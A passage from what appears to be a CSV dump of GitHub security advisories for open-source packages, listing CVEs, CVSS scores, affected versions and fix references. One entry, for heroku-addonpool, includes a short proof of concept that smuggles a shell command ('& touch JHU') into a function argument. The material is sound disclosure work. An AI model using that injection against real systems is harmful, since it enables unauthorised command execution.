'nvd_published_at': None}" +1.4.0,GHSA-23fp-fmrv-f5px,2021-03-30T13:53:18Z,2021-12-10T17:22:01Z,,['CVE-2020-8123'],Uncontrolled Resource Consumption in strapi,A denial of service exists in strapi v3.0.0-beta.18.3 and earlier that can be abused in the admin console using admin rights can lead to arbitrary restart of the application.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'strapi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0-beta.18.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.0.0-beta.18.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8123'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/commit/c0c191c08f05fe10d7a6b1bf9475c1a651a89362'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/768574'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-30T13:53:18Z', 'nvd_published_at': '2020-02-04T20:15:00Z'}" +1.4.0,GHSA-9w8f-7wgr-2h7g,2021-12-03T15:37:45Z,2021-12-03T20:42:59Z,,['CVE-2021-3992'],kimai2 is vulnerable to Improper Access Control,kimai2 is vulnerable to Improper Access Control,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'kevinpapst/kimai2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.16.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3992'}, {'type': 'WEB', 'url': 'https://github.com/kevinpapst/kimai2/commit/ff9acab0fc81f0e9490462739ef15fe4ab028ea5'}, {'type': 'PACKAGE', 'url': 'https://github.com/kevinpapst/kimai2'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/a0c438fb-c8e1-40cf-acc6-c8a532b80b93'}]","{'cwe_ids': ['CWE-284', 'CWE-639', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-03T15:37:45Z', 'nvd_published_at': '2021-12-01T11:15:00Z'}" +1.4.0,GHSA-j7c3-96rf-jrrp,2021-12-16T18:57:47Z,2021-12-16T21:01:51Z,,[],Critical vulnerability in log4j may affect generated PEAR projects,"### Impact +UIMA PEAR projects that have been generated with the `de.averbis.textanalysis:pear-archetype ` version `2.0.0` have a maven dependency with scope `test` to` log4j 2.8.2` and might be affected by CVE-2021-44228. + +### Patches +- The issue has been resolved in `de.averbis.textanalysis:pear-archetype ` version `2.0.1`. Please make sure to use `de.averbis.textanalysis:pear-archetype ` version >= `2.0.1` for generating new PEAR projects. + +- Existing maven PEAR projects can be patched by manually upgrading to `log4j` >= `2.16.0` in `pom.xml`. + + +### References +https://www.lunasec.io/docs/blog/log4j-zero-day/ + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in https://github.com/averbis/pear-archetype/issues +",[],"[{'package': {'ecosystem': 'Maven', 'name': 'de.averbis.textanalysis:pear-archetype'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.1'}]}], 'versions': ['2.0.0']}]","[{'type': 'WEB', 'url': 'https://github.com/averbis/pear-archetype/security/advisories/GHSA-j7c3-96rf-jrrp'}, {'type': 'WEB', 'url': 'https://github.com/averbis/pear-archetype/commit/6815f5981c836ab8c345a6ff54f29e9f4b67f7eb'}, {'type': 'PACKAGE', 'url': 'https://github.com/averbis/pear-archetype'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-12-16T18:57:47Z', 'nvd_published_at': None}" +1.4.0,GHSA-2x32-jm95-2cpx,2021-06-01T17:58:22Z,2021-12-20T17:52:12Z,,['CVE-2020-27847'],Authentication Bypass in dex,"A vulnerability exists in the SAML connector of the github.com/dexidp/dex library used to process SAML Signature Validation. This flaw allows an attacker to bypass SAML authentication. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. This flaw affects dex versions before 2.27.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/dexidp/dex'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.27.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dexidp/dex/security/advisories/GHSA-m9hp-7r99-94h5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-27847'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1907732'}, {'type': 'WEB', 'url': 'https://mattermost.com/blog/coordinated-disclosure-go-xml-vulnerabilities/'}]","{'cwe_ids': ['CWE-228', 'CWE-290'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T17:58:22Z', 'nvd_published_at': '2021-05-28T11:15:00Z'}" +1.4.0,GHSA-9x7m-9hpg-xxmw,2021-07-19T15:44:57Z,2021-12-10T17:24:16Z,,['CVE-2021-25953'],Prototype Pollution in putil-merge,Prototype pollution vulnerability in 'putil-merge' versions1.0.0 through 3.6.6 allows attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'putil-merge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '3.7.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.6.6'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25953'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25953'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-07-15T20:19:36Z', 'nvd_published_at': '2021-07-14T11:15:00Z'}" +1.4.0,GHSA-95jp-77w6-qj52,2021-12-06T18:19:24Z,2021-12-06T18:17:45Z,,['CVE-2009-4924'],Cross-site Scripting in python-cjson,"Python-cjson 1.0.5 does not properly handle a ['/'] argument to cjson.encode, which makes it easier for remote attackers to conduct certain cross-site scripting (XSS) attacks involving Firefox and the end tag of a SCRIPT element.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'python-cjson'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2009-4924'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-db/tree/main/vulns/python-cjson/PYSEC-2010-26.yaml'}, {'type': 'WEB', 'url': 'http://pypi.python.org/pypi/python-cjson/'}, {'type': 'WEB', 'url': 'http://t3.dotgnu.info/blog/insecurity/quotes-dont-help.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-06T18:17:00Z', 'nvd_published_at': None}" +1.4.0,GHSA-3q9x-w53p-jg53,2023-09-13T21:57:41Z,2021-12-09T19:52:03Z,,['CVE-2020-7634'],OS Command Injection in heroku-addonpool,"heroku-addonpool through 0.1.15 is vulnerable to Command Injection. The second parameter of the exported function `HerokuAddonPool(id, app, opt)` can be controlled by users without any sanitization. + +**PoC** +```js +var Root = require(""heroku-addonpool""); +var root = Root(""sss"", ""& touch JHU"", {}); +root.setup(); +```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'heroku-addonpool'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.16'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7634'}, {'type': 'WEB', 'url': 'https://github.com/nodef/heroku-addonpool/commit/b1a5b316473ac92d783f3d54ee048d54082da38d'}, {'type': 'WEB', 'url': 'https://github.com/nodef/heroku-addonpool/blob/master/index.js'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-HEROKUADDONPOOL-564428'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T22:14:43Z', 'nvd_published_at': '2020-04-06T13:15:00Z'}" +1.4.0,GHSA-v95c-p5hm-xq8f,2023-08-29T22:55:54Z,2021-12-07T21:22:39Z,,['CVE-2021-43784'],Overflow in netlink bytemsg length field allows attacker to override netlink-based container configuration in RunC,"### Impact + +In runc, [netlink](https://www.man7.org/linux/man-pages/man7/netlink.7.html) is used internally as a serialization system for specifying the relevant container configuration to the C portion of our code (responsible for the based namespace setup of containers). In all versions of runc prior to 1.0.3, the encoder did not handle the possibility of an integer overflow in the 16-bit length field for the byte array attribute type, meaning that a large enough malicious byte array attribute could result in the length overflowing and the attribute contents being parsed as netlink messages for container configuration. + +This vulnerability requires the attacker to have some control over the configuration of the container and would allow the attacker to bypass the namespace restrictions of the container by simply adding their own netlink payload which disables all namespaces. + +Prior to 9c444070ec7bb83995dbc0185da68284da71c554, in practice it was fairly difficult to specify an arbitrary-length netlink message with most container runtimes. The only user-controlled byte array was the namespace paths attributes which can be specified in runc's `config.json`, but as far as we can tell no container runtime gives raw access to that configuration setting -- and having raw access to that setting **would allow the attacker to disable namespace protections entirely anyway** (setting them to `/proc/1/ns/...` for instance). In addition, each namespace path is limited to 4096 bytes (with only 7 namespaces supported by runc at the moment) meaning that even with custom namespace paths it appears an attacker still cannot shove enough bytes into the netlink bytemsg in order to overflow the uint16 counter. + +However, out of an abundance of caution (given how old this bug is) we decided to treat it as a potentially exploitable vulnerability with a low severity. After 9c444070ec7bb83995dbc0185da68284da71c554 (which was not present in any release of runc prior to the discovery of this bug), all mount paths are included as a giant netlink message which means that this bug becomes significantly more exploitable in more reasonable threat scenarios. + +The main users impacted are those who allow untrusted images with untrusted configurations to run on their machines (such as with shared cloud infrastructure), though as mentioned above it appears this bug was not practically exploitable on any released version of runc to date. + +### Patches +The patch for this is d72d057ba794164c3cce9451a00b72a78b25e1ae and runc 1.0.3 was released with this bug fixed. + +### Workarounds +To the extent this is exploitable, disallowing untrusted namespace paths in container configuration should eliminate all practical ways of exploiting this bug. It should be noted that untrusted namespace paths would allow the attacker to disable namespace protections entirely even in the absence of this bug. + +### References +* commit d72d057ba794 (""runc init: avoid netlink message length overflows"") +* https://bugs.chromium.org/p/project-zero/issues/detail?id=2241 + +### Credits +Thanks to Felix Wilhelm from Google Project Zero for discovering and reporting this vulnerability. In particular, the fact they found this vulnerability so quickly, before we made a 1.1 release of runc (which would've been vulnerable) was quite impressive. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [our repo](https://github.com/opencontainers/runc) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/opencontainers/runc'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/security/advisories/GHSA-v95c-p5hm-xq8f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43784'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/commit/9c444070ec7bb83995dbc0185da68284da71c554'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/commit/d72d057ba794164c3cce9451a00b72a78b25e1ae'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/commit/dde509df4e28cec33b3c99c6cda3d4fd5beafc77'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/commit/f50369af4b571e358f20b139eea52d612eb55eed'}, {'type': 'WEB', 'url': 'https://bugs.chromium.org/p/project-zero/issues/detail?id=2241'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencontainers/runc'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/12/msg00005.html'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0274'}]","{'cwe_ids': ['CWE-190'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-06T22:09:36Z', 'nvd_published_at': '2021-12-06T18:15:00Z'}" +1.4.0,GHSA-6r7c-6w96-8pvw,2022-01-04T18:56:03Z,2021-12-07T21:21:49Z,,[],Remote Code Execution in AjaxNetProfessional,"### Overview + +Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to the possibility of deserialization of arbitrary .NET classes, which can be abused to gain remote code execution. + +### Description + +Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc. + +Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution. + +Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products. + +An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed. + +Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands). + +### Releases + +Releases before version 21.11.29.1 are affected. Please be careful to download any binary DLL from other web sites, especially we found NuGet packages not owned by us that contain vulnerable versions. + +### Workarounds + +There is no workaround available that addresses all issues except updating to latest version from GitHub. + +### References + +Find original CVE posting here: https://security.snyk.io/vuln/SNYK-DOTNET-AJAXPRO2-1925971 + +Note: the official Ajax.NET Professional (AjaxPro) NuGet package is available here: https://www.nuget.org/packages/AjaxNetProfessional/ + +### For more information + +If you have any questions or comments about this advisory: +* Open an issue on this GitHub repository +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'AjaxNetProfessional'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.11.29.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 21.11.29'}}]","[{'type': 'WEB', 'url': 'https://github.com/michaelschwarz/Ajax.NET-Professional/security/advisories/GHSA-6r7c-6w96-8pvw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23758'}, {'type': 'WEB', 'url': 'https://github.com/michaelschwarz/Ajax.NET-Professional/commit/b0e63be5f0bb20dfce507cb8a1a9568f6e73de57'}, {'type': 'PACKAGE', 'url': 'https://github.com/michaelschwarz/Ajax.NET-Professional'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-DOTNET-AJAXPRO2-1925971'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-12-06T21:20:20Z', 'nvd_published_at': None}" +1.4.0,GHSA-gjrj-9rj4-pgwx,2021-12-17T19:33:49Z,2021-12-15T22:51:07Z,,[],DoS Vulnerability from Upstream Actix Web Issues,"### Impact +This vulnerability affects all users of the `perseus deploy` functionality who have not exported their sites to static files. If you are using the inbuilt Perseus server in production, there is a memory leak in Actix Web stemming from [this upstream issue](https://github.com/actix/actix-web/issues/1780) which can allow even a single user to cause the process to exhaust its memory on low-memory servers by continuously reloading the page. Note that this issue does not affect all Actix Web applications, but rather results from certain usage patterns which appear to be present in Perseus' server mechanics. + +### Patches +This vulnerability is addressed in all versions after Perseus `v0.3.0-beta.21`, which temporarily discontinues the use of `perseus-actix-web` (until the upstream bug is fixed) and switches to `perseus-warp` instead, which utilizes [Warp](https://github.com/seanmonstar/warp). + +Additionally, as of Perseus `v0.3.0-beta.22`, the Actix Web integration has been upgraded to use the latest unstable beta version of Actix Web, which appears to partially resolve this issue (the severity of the memory leak is reduced). However, due to the instability of this version, the default integration will remain Warp for now, and a warning will appear if you attempt to use the Actix Web integration. + +
+Using the Actix Web integration + +If the instability of the latest beta version of Actix Web is not a concern for you, you can use this integration by adding `-i actix-web` to `perseus serve` and the like. This will print a warning about instability, and will then operate with the beta version. Please report any failures in functionality that are not security-related to the Perseus team by [opening an issue on the repository](https://github.com/arctic-hen7/perseus/issues/new/choose). + +Note however that switching to the Warp integration requires no code changes whatsoever unless you've ejected, so there are very few disadvantages to this change. + +
+ +### Workarounds +Due to significant infrastructural changes within other Perseus packages that were needed to support Warp, this integration is not backward-compatible with any previous version of Perseus, meaning there are no easily feasible workarounds. If you're only in development though, this vulnerability is irrelevant until you push to production. + +### CVE Status + +Due to GitHub's requirements, a CVE can't be issued for this security advisory because the issue is technically one with Actix Web (though it's only in combination with certain mechanics in the Perseus server that this problem arises). + +### References +See [this upstream issue](https://github.com/actix/actix-web/issues/1780) in Actix Web. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue on this repository +* Email me at [arctic_hen7@pm.me](mailto:arctic_hen7@pm.me) +",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'perseus-actix-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0-beta.22'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.3.0-beta.21'}}]","[{'type': 'WEB', 'url': 'https://github.com/arctic-hen7/perseus/security/advisories/GHSA-gjrj-9rj4-pgwx'}, {'type': 'WEB', 'url': 'https://github.com/actix/actix-web/issues/1780'}, {'type': 'PACKAGE', 'url': 'https://github.com/arctic-hen7/perseus'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-15T21:42:48Z', 'nvd_published_at': None}" +1.4.0,GHSA-g6vq-wc8w-4g69,2021-12-03T15:19:23Z,2021-12-06T17:19:18Z,,['CVE-2021-4015'],firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF),firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'grumpydictator/firefly-iii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4015'}, {'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/commit/518b4ba5a7a56760902758ae0a2c6a392c2f4d37'}, {'type': 'PACKAGE', 'url': 'https://github.com/firefly-iii/firefly-iii'}, {'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/releases/tag/5.6.5'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/b698d445-602d-4701-961c-dffe6d3009b1'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-02T21:22:54Z', 'nvd_published_at': '2021-12-01T11:15:00Z'}" +1.4.0,GHSA-f3w5-v9xx-rp8p,2021-05-20T20:10:47Z,2021-12-20T18:17:41Z,,[],Signature verification failure in Tendermint,"_The root cause of this security vulnerability is in the Tendermint specification, and this advisory is a duplicate of https://github.com/tendermint/spec/security/advisories/GHSA-jqfc-687g-59pw._ + + +### Impact +Tendermint light clients running versions 0.34.0 to 0.34.8 are unable to detect and punish a new kind of attack. We’re calling this a “forward lunatic attack,” or FLA. The severity of this vulnerability is _moderate_. + +Note that an FLA cannot be successfully executed unless there are already ⅓+ Byzantine validators, and therefore outside of Tendermint’s security model; however, it is important to be able to detect and punish these kinds of attacks in order to incentivize correct behavior. + +In an FLA, an attacking validator (with ⅓+ voting power) signs commit messages for arbitrary application state associated with a block height that hasn’t been seen yet, hence the name “forward lunatic attacks.” A malicious validator effectively executes a [lunatic attack](https://docs.tendermint.com/master/spec/light-client/accountability/#the-misbehavior-of-faulty-validators), but signs messages for a target block that is higher than the current block. This can be dangerous: Typically, misbehavior evidence is only created when there are conflicting blocks at the same height, but by targeting a block height that is far “ahead” of the current chain height, it’s possible that the chain will not produce a (conflicting) block at the target height in time to create evidence. + +Prior to Tendermint v0.34.9, the light client could accept a bad header from its primary witness, and would not be able to form evidence of this deception, even if all the secondary witnesses were correct. Because the light client is responsible for verifying cross-chain state for IBC, a successful FLA could result in loss of funds. However, it is important to note that FLAs are only possible outside the Tendermint security model. + +All FLAs, attempted and successful, leave traces of provable misbehavior on-chain. A faulty header contains signatures from the faulty validator, and even in unpatched versions of Tendermint Core, networks could use social consensus (off-chain action) to recover the network. The patches introduced in Tendermint Core v0.34.9 handle all evidence automatically and on-chain. + +Note that this fix also allows for successful automatic reporting of FLAs, even after a chain halt. By adding a time to FetchBlock, light clients effectively have a backup way to determine if a halted chain should have continued, and it will be able to submit evidence as soon as the chain resumes. + +### Patches +This problem has been patched in Tendermint Core v0.34.9. + +### Workarounds +There are no workarounds. All users are recommended to upgrade to Tendermint Core v0.34.9 at their earliest possible convenience. + +### Credits + +Thank you to @MaximilianDiez for originally surfacing this issue, and to @cmwaters, @josef-widder, and @milosevic for creating fixes at both the implementation and specification level. + +### For more information + +If you have any questions or comments about this advisory: +* Open an issue in [tendermint/tendermint](https://github.com/tendermint/tendermint) +* Email us at [security@tendermint.com](mailto:security@tendermint.com)",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/tendermint/tendermint'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.34.0'}, {'fixed': '0.34.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tendermint/tendermint/security/advisories/GHSA-f3w5-v9xx-rp8p'}]","{'cwe_ids': ['CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T20:10:47Z', 'nvd_published_at': None}" +1.4.0,GHSA-2589-w6xf-983r,2021-07-01T21:48:39Z,2021-12-10T18:58:49Z,,['CVE-2021-23398'],Cross-site scripting in react-bootstrap-table,"All versions of package react-bootstrap-table are vulnerable to Cross-site Scripting (XSS) via the dataFormat parameter. The problem is triggered when an invalid React element is returned, leading to dangerouslySetInnerHTML being used, which does not sanitize the output.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'react-bootstrap-table'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23398'}, {'type': 'WEB', 'url': 'https://github.com/AllenFang/react-bootstrap-table/issues/2071'}, {'type': 'WEB', 'url': 'https://github.com/AllenFang/react-bootstrap-table/blob/26d07defab759e4f9bce22d1d568690830b8d9d7/src/TableBody.js%23L114-L118'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1314286'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-REACTBOOTSTRAPTABLE-1314285'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-25T13:08:06Z', 'nvd_published_at': '2021-06-24T15:15:00Z'}" +1.4.0,GHSA-74r6-grj9-8rq6,2021-12-06T22:06:15Z,2021-12-16T15:27:55Z,,['CVE-2021-23758'],Remote Code Execution in AjaxNetProfessional,"All versions of package ajaxpro.2 are vulnerable to Deserialization of Untrusted Data due to the possibility of deserialization of arbitrary .NET classes, which can be abused to gain remote code execution.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'AjaxNetProfessional'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.11.29.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 21.11.29'}}]","[{'type': 'WEB', 'url': 'https://github.com/michaelschwarz/Ajax.NET-Professional/security/advisories/GHSA-6r7c-6w96-8pvw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23758'}, {'type': 'WEB', 'url': 'https://github.com/michaelschwarz/Ajax.NET-Professional/commit/b0e63be5f0bb20dfce507cb8a1a9568f6e73de57'}, {'type': 'PACKAGE', 'url': 'https://github.com/michaelschwarz/Ajax.NET-Professional'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-DOTNET-AJAXPRO2-1925971'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-12-06T22:06:15Z', 'nvd_published_at': '2021-12-03T20:15:00Z'}" +1.4.0,GHSA-49vv-6q7q-w5cf,2021-09-01T19:36:25Z,2021-12-10T17:22:12Z,,['CVE-2019-19609'],OS Command Injection in Strapi,"The Strapi framework before 3.0.0-beta.17.8 is vulnerable to Remote Code Execution in the Install and Uninstall Plugin components of the Admin panel, because it does not sanitize the plugin name, and attackers can inject arbitrary shell commands to be executed by the execa function.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'strapi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0-beta.17.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.0.0-beta.17.7'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-19609'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/pull/4636'}, {'type': 'WEB', 'url': 'https://bittherapy.net/post/strapi-framework-remote-code-execution/'}, {'type': 'PACKAGE', 'url': 'https://github.com/strapi/strapi'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/163940/Strapi-3.0.0-beta.17.7-Remote-Code-Execution.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/163950/Strapi-CMS-3.0.0-beta.17.4-Remote-Code-Execution.html'}]","{'cwe_ids': ['CWE-20', 'CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T15:24:09Z', 'nvd_published_at': '2019-12-05T20:15:00Z'}" +1.4.0,GHSA-wp4h-pvgw-5727,2021-12-02T14:45:03Z,2021-12-02T14:50:51Z,,['CVE-2019-0230'],Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts,"Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.struts:struts2-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.5.22'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0230'}, {'type': 'WEB', 'url': 'https://cwiki.apache.org/confluence/display/ww/s2-059'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/struts'}, {'type': 'WEB', 'url': 'https://launchpad.support.sap.com/#/notes/2982840'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': 